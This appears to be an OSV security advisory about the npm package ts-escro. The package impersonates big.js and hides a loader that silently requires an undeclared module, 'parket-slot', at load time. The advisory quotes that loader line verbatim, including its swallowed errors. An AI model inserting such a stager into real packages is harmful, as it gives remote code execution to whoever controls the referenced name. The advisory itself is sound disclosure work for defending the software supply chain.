OSV ID
MAL-2026-6319
Ecosystem
npm
Summary
The package ships a verbatim copy of MikeMcl/big.js v7.0.1 (same banner, MIT copyright, and API) but is published under a different name (ts-escro). At module load time, big.js line 606 (and big.mjs:606) executes try { const doc = require('parket-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {} , silently attempting to load and invoke an undeclared third-party module 'parket-slot' with all errors swallowed. The package.json declares no dependency on 'parket-slot'; the only declared dependency is a non-resolvable local filesystem path log-taker: file:../log-taker , which indicates the artifact was published from a staging directory and could not have been produced through normal release engineering. Any consumer that require()s ts-escro triggers the hidden loader. Whoever controls future publishes of the 'parket-slot' name turns every ts-escro install into remote code execution at require-time. The impersonation-of-big.js cover, undeclared loader, swallowed errors, and broken staging dependency together establish a typosquat-loader / stager pattern with clear malicious intent.
Source: amazon-inspector (26030cb7301c4ff9ea68753581f70290a957e1422b425df7119416fea126c324)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.